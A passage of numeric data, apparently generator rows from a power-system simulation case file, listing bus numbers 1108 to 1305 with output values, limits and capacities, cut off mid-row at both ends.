0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1108, 52.773682, 0, 9999, -9999, 1.0, 100, 1, 320.422751, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1109, 0.238684, 0, 9999, -9999, 1.0, 100, 1, 0.77821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1110, 0.493955, 0, 9999, -9999, 1.0, 100, 1, 1.654557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1111, 13.987497, 0, 9999, -9999, 1.0, 100, 1, 89.637993, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1112, 19.793037, 0, 9999, -9999, 1.0, 100, 1, 69.53429, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1113, 0.993555, 0, 9999, -9999, 1.0, 100, 1, 3.536361, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1114, 4.193223, 0, 9999, -9999, 1.0, 100, 1, 13.446889, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1115, 17.279445, 0, 9999, -9999, 1.0, 100, 1, 50.575278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1116, 10.092793, 0, 9999, -9999, 1.0, 100, 1, 32.601142, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1117, 29.767469, 0, 9999, -9999, 1.0, 100, 1, 90.792541, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1118, 2.116037, 0, 9999, -9999, 1.0, 100, 1, 8.725012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1119, 13.055817, 0, 9999, -9999, 1.0, 100, 1, 43.254023, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1120, 0.672068, 0, 9999, -9999, 1.0, 100, 1, 2.416001, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1121, 0.148154, 0, 9999, -9999, 1.0, 100, 1, 0.540589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1122, 0.417065, 0, 9999, -9999, 1.0, 100, 1, 1.462883, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1123, 0.321549, 0, 9999, -9999, 1.0, 100, 1, 1.464336, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1124, 0.367764, 0, 9999, -9999, 1.0, 100, 1, 1.288283, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1125, 8.242618, 0, 9999, -9999, 1.0, 100, 1, 25.818899, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1126, 9.470981, 0, 9999, -9999, 1.0, 100, 1, 29.154893, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1127, 25.886539, 0, 9999, -9999, 1.0, 100, 1, 105.296621, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1128, 0.896818, 0, 9999, -9999, 1.0, 100, 1, 3.06139, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1129, 1.37312, 0, 9999, -9999, 1.0, 100, 1, 4.738747, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1130, 0.33233, 0, 9999, -9999, 1.0, 100, 1, 1.025754, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1131, 0.842019, 0, 9999, -9999, 1.0, 100, 1, 2.897078, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1132, 0.118986, 0, 9999, -9999, 1.0, 100, 1, 0.359497, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1133, 0.197213, 0, 9999, -9999, 1.0, 100, 1, 0.719597, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1134, 0.139346, 0, 9999, -9999, 1.0, 100, 1, 0.508453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1135, 2.234589, 0, 9999, -9999, 1.0, 100, 1, 8.117819, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1136, 0.105621, 0, 9999, -9999, 1.0, 100, 1, 0.4027, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1137, 0.618441, 0, 9999, -9999, 1.0, 100, 1, 3.669012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1138, 0.3024, 0, 9999, -9999, 1.0, 100, 1, 1.254278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1139, 5.635637, 0, 9999, -9999, 1.0, 100, 1, 19.822769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1140, 10.119359, 0, 9999, -9999, 1.0, 100, 1, 28.389457, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1141, 34.724585, 0, 9999, -9999, 1.0, 100, 1, 119.46456, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1142, 0.311244, 0, 9999, -9999, 1.0, 100, 1, 1.215733, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1143, 7.267318, 0, 9999, -9999, 1.0, 100, 1, 25.239356, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1144, 18.434566, 0, 9999, -9999, 1.0, 100, 1, 52.527382, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1145, 76.670795, 0, 9999, -9999, 1.0, 100, 1, 175.889627, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1146, 0.236053, 0, 9999, -9999, 1.0, 100, 1, 0.861317, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1147, 14.352848, 0, 9999, -9999, 1.0, 100, 1, 45.703707, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1148, 4.956621, 0, 9999, -9999, 1.0, 100, 1, 17.645529, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1149, 2.684959, 0, 9999, -9999, 1.0, 100, 1, 8.556784, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1150, 1.078459, 0, 9999, -9999, 1.0, 100, 1, 3.62256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1151, 4.024954, 0, 9999, -9999, 1.0, 100, 1, 13.036113, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1152, 0.033193, 0, 9999, -9999, 1.0, 100, 1, 0.116518, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1153, 0.014298, 0, 9999, -9999, 1.0, 100, 1, 0.068788, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1154, 0.033387, 0, 9999, -9999, 1.0, 100, 1, 0.160625, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1155, 0.185244, 0, 9999, -9999, 1.0, 100, 1, 0.609451, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1156, 4.390353, 0, 9999, -9999, 1.0, 100, 1, 16.022334, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1157, 1.342369, 0, 9999, -9999, 1.0, 100, 1, 4.354147, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1158, 0.244439, 0, 9999, -9999, 1.0, 100, 1, 1.04304, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1159, 3.488642, 0, 9999, -9999, 1.0, 100, 1, 13.498087, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1160, 32.159919, 0, 9999, -9999, 1.0, 100, 1, 238.377761, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1161, 1.898695, 0, 9999, -9999, 1.0, 100, 1, 25.263391, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1162, 23.517703, 0, 9999, -9999, 1.0, 100, 1, 502.409178, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1163, 11.876556, 0, 9999, -9999, 1.0, 100, 1, 330.03194, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1164, 32.972541, 0, 9999, -9999, 1.0, 100, 1, 285.625412, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1165, 4.125524, 0, 9999, -9999, 1.0, 100, 1, 57.188579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1166, 11.643995, 0, 9999, -9999, 1.0, 100, 1, 83.277163, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1167, 1.18715, 0, 9999, -9999, 1.0, 100, 1, 5.05378, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1168, 0.315966, 0, 9999, -9999, 1.0, 100, 1, 1.345774, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1169, 0.747276, 0, 9999, -9999, 1.0, 100, 1, 2.721845, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1170, 0.061982, 0, 9999, -9999, 1.0, 100, 1, 0.26599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1171, 1.298049, 0, 9999, -9999, 1.0, 100, 1, 9.029885, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1172, 0.166383, 0, 9999, -9999, 1.0, 100, 1, 3.584043, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1173, 21.218988, 0, 9999, -9999, 1.0, 100, 1, 254.253327, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1174, 0.295864, 0, 9999, -9999, 1.0, 100, 1, 1.260082, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1175, 0.200762, 0, 9999, -9999, 1.0, 100, 1, 0.855454, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1176, 0.070191, 0, 9999, -9999, 1.0, 100, 1, 0.23222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1177, 6.832064, 0, 9999, -9999, 1.0, 100, 1, 27.87401, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1178, 1.004198, 0, 9999, -9999, 1.0, 100, 1, 3.167999, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1179, 0.405725, 0, 9999, -9999, 1.0, 100, 1, 1.306293, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1180, 0.160804, 0, 9999, -9999, 1.0, 100, 1, 0.688545, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1181, 25.552448, 0, 9999, -9999, 1.0, 100, 1, 85.739557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1182, 35.66476, 0, 9999, -9999, 1.0, 100, 1, 99.319579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1183, 8.614232, 0, 9999, -9999, 1.0, 100, 1, 38.222575, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1184, 1.184324, 0, 9999, -9999, 1.0, 100, 1, 4.219005, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1185, 3.226777, 0, 9999, -9999, 1.0, 100, 1, 11.343971, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1186, 11.619283, 0, 9999, -9999, 1.0, 100, 1, 38.916368, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1187, 2.996817, 0, 9999, -9999, 1.0, 100, 1, 9.814574, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1188, 35.646014, 0, 9999, -9999, 1.0, 100, 1, 179.712741, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1189, 3.159835, 0, 9999, -9999, 1.0, 100, 1, 20.261805, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1190, 108.782805, 0, 9999, -9999, 1.0, 100, 1, 220.533673, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1191, 35.617171, 0, 9999, -9999, 1.0, 100, 1, 73.079413, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1192, 3.172086, 0, 9999, -9999, 1.0, 100, 1, 21.454569, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1193, 0.500556, 0, 9999, -9999, 1.0, 100, 1, 2.399953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1194, 1.816687, 0, 9999, -9999, 1.0, 100, 1, 8.986036, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1195, 0.052039, 0, 9999, -9999, 1.0, 100, 1, 0.202359, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1196, 18.761704, 0, 9999, -9999, 1.0, 100, 1, 160.697956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1197, 9.000705, 0, 9999, -9999, 1.0, 100, 1, 90.592266, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1198, 10.160718, 0, 9999, -9999, 1.0, 100, 1, 39.819157, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1199, 81.349097, 0, 9999, -9999, 1.0, 100, 1, 201.421956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1200, 28.472225, 0, 9999, -9999, 1.0, 100, 1, 56.012408, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1201, 11.669326, 0, 9999, -9999, 1.0, 100, 1, 25.166667, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1202, 11.314769, 0, 9999, -9999, 1.0, 100, 1, 49.89238, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1203, 58.94637, 0, 9999, -9999, 1.0, 100, 1, 182.623256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1204, 7.28512, 0, 9999, -9999, 1.0, 100, 1, 47.541821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1205, 0.060089, 0, 9999, -9999, 1.0, 100, 1, 0.548843, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1206, 0.725628, 0, 9999, -9999, 1.0, 100, 1, 3.806894, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1207, 0.745728, 0, 9999, -9999, 1.0, 100, 1, 3.575453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1208, 0.346573, 0, 9999, -9999, 1.0, 100, 1, 2.242031, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1209, 0.003163, 0, 9999, -9999, 1.0, 100, 1, 1.268261, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1210, 0.369798, 0, 9999, -9999, 1.0, 100, 1, 9.02599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1211, 7.855119, 0, 9999, -9999, 1.0, 100, 1, 18.005229, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1212, 39.67905, 0, 9999, -9999, 1.0, 100, 1, 91.171888, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1213, 29.033025, 0, 9999, -9999, 1.0, 100, 1, 57.342704, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1214, 0.50945, 0, 9999, -9999, 1.0, 100, 1, 4.505907, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1215, 0.233874, 0, 9999, -9999, 1.0, 100, 1, 2.252965, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1216, 6.320709, 0, 9999, -9999, 1.0, 100, 1, 67.754469, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1217, 3.148423, 0, 9999, -9999, 1.0, 100, 1, 35.871617, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1218, 0.083256, 0, 9999, -9999, 1.0, 100, 1, 0.980482, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1219, 4.033072, 0, 9999, -9999, 1.0, 100, 1, 12.33953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1220, 7.351309, 0, 9999, -9999, 1.0, 100, 1, 30.597849, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1221, 85.891484, 0, 9999, -9999, 1.0, 100, 1, 593.230436, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1222, 89.62444, 0, 9999, -9999, 1.0, 100, 1, 211.057769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1223, 2.053312, 0, 9999, -9999, 1.0, 100, 1, 3.806101, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1224, 20.564489, 0, 9999, -9999, 1.0, 100, 1, 160.523778, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1225, 1.504238, 0, 9999, -9999, 1.0, 100, 1, 34.931481, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1226, 0.292591, 0, 9999, -9999, 1.0, 100, 1, 3.982858, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1227, 10.329377, 0, 9999, -9999, 1.0, 100, 1, 17.482807, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1228, 0.60249, 0, 9999, -9999, 1.0, 100, 1, 3.021367, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1229, 16.084016, 0, 9999, -9999, 1.0, 100, 1, 51.244222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1230, 0.161236, 0, 9999, -9999, 1.0, 100, 1, 1.681276, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1231, 2.108789, 0, 9999, -9999, 1.0, 100, 1, 33.55478, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1232, 5.431852, 0, 9999, -9999, 1.0, 100, 1, 75.075088, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1233, 370.234968, 0, 9999, -9999, 1.0, 100, 1, 575.36828, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1235, 2.673056, 0, 9999, -9999, 1.0, 100, 1, 9.03734, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1236, 24.136537, 0, 9999, -9999, 1.0, 100, 1, 82.225035, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1237, 4.483171, 0, 9999, -9999, 1.0, 100, 1, 14.605409, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1238, 23.856662, 0, 9999, -9999, 1.0, 100, 1, 188.691049, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1239, 0.964666, 0, 9999, -9999, 1.0, 100, 1, 2.267706, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1240, 21.996865, 0, 9999, -9999, 1.0, 100, 1, 339.51051, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1241, 75.165647, 0, 9999, -9999, 1.0, 100, 1, 385.361595, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1242, 2.433241, 0, 9999, -9999, 1.0, 100, 1, 27.074038, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1243, 12.445678, 0, 9999, -9999, 1.0, 100, 1, 83.079842, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1244, 94.779941, 0, 9999, -9999, 1.0, 100, 1, 323.472536, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1245, 0.791589, 0, 9999, -9999, 1.0, 100, 1, 8.080896, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1246, 18.846176, 0, 9999, -9999, 1.0, 100, 1, 57.127825, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1247, 7.316621, 0, 9999, -9999, 1.0, 100, 1, 21.833396, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1248, 25.533036, 0, 9999, -9999, 1.0, 100, 1, 91.958275, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1249, 21.304583, 0, 9999, -9999, 1.0, 100, 1, 76.135177, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1250, 10.243871, 0, 9999, -9999, 1.0, 100, 1, 30.830519, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1251, 5.769847, 0, 9999, -9999, 1.0, 100, 1, 23.404345, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1252, 2.846162, 0, 9999, -9999, 1.0, 100, 1, 14.887727, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1253, 7.28415, 0, 9999, -9999, 1.0, 100, 1, 64.502694, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1254, 14.834356, 0, 9999, -9999, 1.0, 100, 1, 82.278695, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1255, 0.6451, 0, 9999, -9999, 1.0, 100, 1, 3.818419, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1256, 2.566465, 0, 9999, -9999, 1.0, 100, 1, 15.091842, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1257, 14.274684, 0, 9999, -9999, 1.0, 100, 1, 88.95288, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1258, 55.403807, 0, 9999, -9999, 1.0, 100, 1, 235.487329, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1259, 16.793242, 0, 9999, -9999, 1.0, 100, 1, 109.288719, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1260, 2.016418, 0, 9999, -9999, 1.0, 100, 1, 20.168717, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1261, 16.785927, 0, 9999, -9999, 1.0, 100, 1, 201.699555, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1262, 0.23816, 0, 9999, -9999, 1.0, 100, 1, 0.524108, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1263, 0.190373, 0, 9999, -9999, 1.0, 100, 1, 0.352421, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1264, 38.399507, 0, 9999, -9999, 1.0, 100, 1, 82.035361, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1265, 3.557379, 0, 9999, -9999, 1.0, 100, 1, 6.654727, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1266, 57.58354, 0, 9999, -9999, 1.0, 100, 1, 119.710849, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1267, 9.076351, 0, 9999, -9999, 1.0, 100, 1, 39.469006, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1268, 0.045074, 0, 9999, -9999, 1.0, 100, 1, 3.4295, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1269, 0.108639, 0, 9999, -9999, 1.0, 100, 1, 5.105829, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1270, 1.474324, 0, 9999, -9999, 1.0, 100, 1, 38.950511, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1271, 4.674285, 0, 9999, -9999, 1.0, 100, 1, 47.371792, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1272, 0.109306, 0, 9999, -9999, 1.0, 100, 1, 1.23166, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1273, 0.428508, 0, 9999, -9999, 1.0, 100, 1, 2.169201, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1274, 14.802293, 0, 9999, -9999, 1.0, 100, 1, 53.095629, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1275, 32.30228, 0, 9999, -9999, 1.0, 100, 1, 99.0753, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1276, 9.277868, 0, 9999, -9999, 1.0, 100, 1, 25.655641, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1277, 13.029433, 0, 9999, -9999, 1.0, 100, 1, 65.611252, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1278, 36.829785, 0, 9999, -9999, 1.0, 100, 1, 170.437781, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1279, 2.4e-05, 0, 9999, -9999, 1.0, 100, 1, 0.004344, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1280, 0.004343, 0, 9999, -9999, 1.0, 100, 1, 0.626494, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1281, 0.000143, 0, 9999, -9999, 1.0, 100, 1, 2.51246, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1282, 0.340152, 0, 9999, -9999, 1.0, 100, 1, 4.363037, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1283, 455.592603, 0, 9999, -9999, 1.0, 100, 1, 1297.764428, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1284, 2.260996, 0, 9999, -9999, 1.0, 100, 1, 28.426322, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1285, 0.000953, 0, 9999, -9999, 1.0, 100, 1, 2.937048, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1286, 5.044283, 0, 9999, -9999, 1.0, 100, 1, 17.872201, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1287, 15.59663, 0, 9999, -9999, 1.0, 100, 1, 93.199628, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1288, 31.199173, 0, 9999, -9999, 1.0, 100, 1, 148.402692, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1289, 9.660419, 0, 9999, -9999, 1.0, 100, 1, 184.149235, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1290, 0.688942, 0, 9999, -9999, 1.0, 100, 1, 4.901974, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1291, 24.754603, 0, 9999, -9999, 1.0, 100, 1, 98.293351, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1292, 9.524481, 0, 9999, -9999, 1.0, 100, 1, 41.682074, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1293, 0.095738, 0, 9999, -9999, 1.0, 100, 1, 2.402107, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1294, 0.217961, 0, 9999, -9999, 1.0, 100, 1, 5.39743, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1295, 0.251668, 0, 9999, -9999, 1.0, 100, 1, 5.873666, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1296, 0.001985, 0, 9999, -9999, 1.0, 100, 1, 27.356489, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1297, 5.419525, 0, 9999, -9999, 1.0, 100, 1, 177.778742, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1298, 0.005522, 0, 9999, -9999, 1.0, 100, 1, 4.014603, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1299, 0.060457, 0, 9999, -9999, 1.0, 100, 1, 2.158207, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1300, 11.914798, 0, 9999, -9999, 1.0, 100, 1, 23.74405, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1301, 30.302518, 0, 9999, -9999, 1.0, 100, 1, 60.863304, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1302, 2.261672, 0, 9999, -9999, 1.0, 100, 1, 4.877299, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1303, 1.984836, 0, 9999, -9999, 1.0, 100, 1, 4.335516, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1304, 3.83938, 0, 9999, -9999, 1.0, 100, 1, 9.594319, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1305, 0.00231, 0, 9999, -9999, 1.0, 100, 1, 0.004567, 0.0, 0, 0, 0, 0, 0, 0, 